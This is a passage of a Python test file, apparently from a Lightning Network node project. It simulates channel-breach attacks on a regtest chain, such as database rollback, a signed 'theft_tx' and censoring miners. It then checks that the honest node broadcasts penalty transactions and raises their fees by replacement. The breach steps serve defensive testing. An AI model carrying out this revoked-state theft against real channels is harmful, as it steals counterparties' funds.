with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True,
'plugin': balance_snaps},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True,
'plugin': balance_snaps}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l1.info['id'], 'localhost', l1.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': [coin_mvt_plugin, balance_snaps],
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': [coin_mvt_plugin, balance_snaps],
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on for closed l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('external', ['penalized'], None, None)],
'C': [('external', ['penalized'], None, None)],
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'E')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
if not chainparams['elements']:
# Also check snapshots
expected_bals_2 = [
{'blockheight': 101, 'accounts': [{'balance': '0msat'}]},
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
# There's a duplicate because we stop and restart l2 twice
# (both times at block 108)
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
]
check_balance_snaps(l2, expected_bals_2)
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2, now back a bit. force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on for closed l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# after 5 blocks, l2 reclaims both their DELAYED_OUTPUT_TO_US and their delayed output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'F'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('external', ['penalized'], None, None)],
'E': [('cid1', ['htlc_tx'], ['to_wallet'], 'G')],
'F': [('wallet', ['deposit'], None, None)],
'G': [('wallet', ['deposit'], None, None)]
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('external', ['stolen'], None, None), ('external', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('external', ['stolen'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
# Use the bcli interface as well, so that we also check the
# bcli interface.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
